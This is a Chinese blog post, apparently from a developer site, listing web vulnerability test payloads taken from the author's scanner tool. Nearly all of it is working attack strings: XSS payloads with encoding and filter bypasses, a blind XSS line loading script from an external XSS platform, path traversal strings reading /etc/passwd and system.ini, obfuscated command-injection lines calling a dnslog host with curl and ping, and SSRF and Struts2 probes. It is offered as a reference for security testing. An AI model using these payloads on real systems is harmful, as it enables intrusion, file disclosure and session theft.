本文提供了多种Web漏洞测试Payload,包括XSS、命令执行及SSRF等漏洞类型的测试案例,适用于不同场景的安全测试。
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。
[反射型xss]
[在html形成]- "'><script>document.title="[random]";</script>
- <script>document.title="[random]";</script>
- <svg onload=document.title="[random]";>
[在js形成]
- document.title="[random]";//
- ;document.title="[random]";//
- ";document.title="[random]";
- ';document.title="[random]";
- ");document.title="[random]";
- ');document.title="[random]";
[在html属性形成(img)]
- 888" onload=document.title="[random]" a="
- 888' onload=document.title="[random]" a='
- 888 onload=document.title="[random]"
[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况
- <script>alert(/StoredXssByScriptTag/);</script>
- "'><script>alert(/StoredXssByScriptTagBypass);</script>
- [Bypass on Event] [事件型绕过]
- <img src=1 οnerrοr=alert(/StoredXssByImgTag/)> #一般富文本不会过滤img标签
- [Bypass pseudo protocol] [伪协议绕过]
- <iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
- <object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
- [Bypass html5 tag] [html5标签绕过]
- <svg οnlοad=prompt(/StoredXssBySvgTag/)>
- <embed src=javascript:alert(/StoredXssByEmbedTag/);>
- [Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
- <embed src=javascript:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
- <video><source οnerrοr=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
- <script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
- 如果进行盲测可以根据xss平台地址替换相应的js触发代码
- "><script src=http://myxss.net/xxxxxx></script>
[静态文件读取]
- [常规检测]
- /../../../../../../../../../../../etc/passwd
- /../../../../../../../../../../../etc/hosts
- /../../../../../../../C:/Windows/system.ini [windows]
- [伪造绕过]
- /././././././././././././././././././././././././../../../../../../../../etc/passwd
- /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
- /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
- /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
- /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts
[后缀绕过]
- /../../../../../../../../../../../etc/passwd#
- /../../../../../../../../../../../etc/passwd%00
- /../../../../../../../../../../../etc/passwd#.jpg
- /../../../../../../../../../../../etc/passwd%00.jpg
- /../../../../../../../../../../../etc/passwd#.html
- /../../../../../../../../../../../etc/passwd%00.html
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html
[命令执行漏洞]
- [常规检测]
- ;curl [random].test.dnslog.link
- | curl [random].test.dnslog.link
- | ping -n 2 [random].test.dnslog.link [Windows]
- | ping -c 2 [random].test.dnslog.link [Linux]
- [绕过检测]
- ;curl [random].test.dnslog.link#
- | curl [random].test.dnslog.link#
- %20|%20curl%20[random].test.dnslog.link
- %20|%20curl%20[random].test.dnslog.link#
- %20|%20ping%20-n%202%20[random].test.dnslog.link
- %20|%20ping%20-c%202%20[random].test.dnslog.link#
- a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
- a=c;b=url;$a$b [random].test.dnslog.link#
- ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
- ${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
- a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link
- a=c;b=url;$a$b{IFS}[random].test.dnslog.link#
[ssrf漏洞]
http://[random].test.dnslog.link/
[strust2命令执行]
?redirect:http://[random].test.dnslog.link/%25{3*4}
扫一扫
312
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
